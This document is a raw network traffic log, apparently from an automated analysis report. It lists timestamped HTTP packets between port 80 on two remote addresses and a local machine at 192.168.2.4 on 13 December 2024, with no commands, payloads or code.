                                                              Dec 13, 2024 07:47:47.553476095 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553486109 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553493023 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553509951 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553519011 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553534031 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553559065 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553567886 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553580999 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553590059 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553622961 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553632021 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553656101 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553664923 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553689957 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553705931 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553930998 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553940058 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553947926 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553977966 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553987026 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.553994894 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.554017067 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.554025888 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.554040909 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.554049969 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.554063082 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601016998 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601043940 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601052999 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601057053 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601068020 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601115942 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601125956 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601134062 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601144075 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601154089 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601195097 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601203918 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601233959 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601243019 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601629972 CET8049773185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:47.601650953 CET8049779185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:47.601660013 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601738930 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.601804972 CET4977380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:47.601824045 CET4977980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:47.602010012 CET4977980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:47.602030039 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602039099 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602047920 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602056980 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602066040 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602104902 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602113962 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602121115 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602130890 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602145910 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602154970 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602262974 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602272987 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602281094 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602289915 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602298021 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602307081 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602314949 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602564096 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602636099 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602644920 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602653027 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602662086 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602669954 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602691889 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602699995 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602708101 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602715969 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602730989 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602740049 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602760077 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602802038 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602869987 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602895975 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.602905035 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603023052 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603033066 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603040934 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603050947 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603059053 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603336096 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603394985 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603403091 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603418112 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603426933 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603435040 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603451014 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603462934 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603491068 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603498936 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603514910 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603523970 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603554964 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603588104 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603596926 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603673935 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603682995 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.603691101 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604000092 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604044914 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604053974 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604062080 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604079008 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604088068 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604191065 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604199886 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604207039 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604216099 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604224920 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604242086 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604249954 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604258060 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604266882 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604440928 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604449987 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604458094 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604468107 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604543924 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604552984 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604559898 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604568005 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.604578972 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605643034 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605654001 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605660915 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605674028 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605690002 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605700016 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605735064 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605743885 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605859995 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605870962 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605880022 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605889082 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605897903 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605907917 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605915070 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605925083 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605932951 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605942011 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605950117 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605953932 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605957031 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605978012 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.605986118 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.606066942 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.606076002 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.606110096 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.606118917 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.606165886 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.606174946 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.606189013 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.606198072 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607530117 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607549906 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607558966 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607666969 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607676983 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607683897 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607692957 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607702017 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607711077 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607719898 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607728004 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607737064 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607743979 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607753038 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607762098 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607769966 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607788086 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607798100 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607805967 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607815027 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.607824087 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608269930 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608279943 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608294964 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608304977 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608314037 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608377934 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608386993 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608395100 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608405113 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608413935 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608423948 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608434916 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608444929 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608454943 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608496904 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608505964 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608513117 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608521938 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608537912 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608597040 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608669043 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.608742952 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609153986 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609241962 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609251022 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609277964 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609287024 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609342098 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609350920 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609358072 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609473944 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609483004 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609489918 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609498978 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609508991 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609517097 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609528065 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609839916 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609898090 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609906912 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609914064 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609922886 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609940052 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609949112 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.609982014 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610061884 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610070944 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610079050 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610167980 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610178947 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610186100 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610196114 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610203981 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610213995 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610223055 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610230923 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610240936 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610249043 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610685110 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610694885 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610783100 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610791922 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610800028 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610897064 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610908031 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610914946 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610924006 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610932112 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610941887 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610950947 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610960007 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610970020 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610979080 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610986948 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.610996008 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611013889 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611022949 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611030102 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611037970 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611047983 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611227036 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611253023 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611301899 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611310959 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611356020 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611365080 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611371994 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611383915 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611433983 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611488104 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611496925 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611504078 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611521006 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611531019 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611540079 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611548901 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611610889 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611619949 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611627102 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611638069 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611646891 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611654043 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.611661911 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612116098 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612126112 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612135887 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612168074 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612215042 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612225056 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612395048 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612404108 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612411022 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612420082 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612423897 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612427950 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612435102 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612443924 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612669945 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612701893 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612744093 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612752914 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612792015 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612799883 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612826109 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612914085 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612925053 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.612932920 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613045931 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613054991 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613063097 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613071918 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613080025 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613090038 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613097906 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613107920 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613116980 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613326073 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613404989 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613430023 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613440037 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613455057 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613476038 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613506079 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613545895 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613555908 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613598108 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613653898 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613663912 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613748074 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613758087 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613761902 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613765001 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613770008 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.613773108 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614206076 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614248037 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614316940 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614326000 CET8049778185.81.68.148192.168.2.4
